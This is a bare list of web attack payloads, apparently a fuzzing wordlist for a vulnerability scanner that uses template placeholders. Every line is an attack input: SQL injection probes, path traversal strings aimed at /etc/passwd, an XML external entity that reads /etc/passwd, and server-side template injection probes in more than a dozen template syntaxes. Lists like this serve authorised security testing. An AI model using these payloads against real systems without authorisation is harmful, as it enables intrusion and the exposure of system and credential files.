11||(case+when+(1=1)+then+1+end)
11||(case+when+(1=1)+then+1+end),NULL
',select(current_users),--
1'+or+1=1 --
../../../../../../../../../../../etc/passwd
..//..//..//..//..//..//..//..//..//etc/passwd
11||(case+when+(1=1)+then+id+end)
11||(case+when+(1=1)+then+id+end),NULL
id=id
<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:////etc/passwd"> ]><x>&{{rletter}};</x>
{{concat("${", "{{6666}}*{{6666}}", "}")}}
{{concat("{{", "{{6666}}*{{6666}}", "}}")}}
{{concat("<%=", "{{6666}}*{{6666}}", "%>")}}
{{concat("{", "{{6666}}*{{6666}}", "}")}}
{{concat("{{{", "{{6666}}*{{6666}}", "}}}")}}
{{concat("${{", "{{6666}}*{{6666}}", "}}")}}
{{concat("#{", "{{6666}}*{{6666}}", "}")}}
{{concat("[[", "{{6666}}*{{6666}}", "]]")}}
{{concat("{{=", "{{6666}}*{{6666}}", "}}")}}
{{concat("[[${", "{{6666}}*{{6666}}", "}]]")}}
{{concat("${xyz|", "{{6666}}*{{6666}}", "}")}}
{{concat("#set($x=", "{{6666}}*{{6666}}", ")${x}")}}
{{concat("@(", "{{6666}}*{{6666}}", ")")}}
{{concat("{@", "{{6666}}*{{6666}}", "}")}}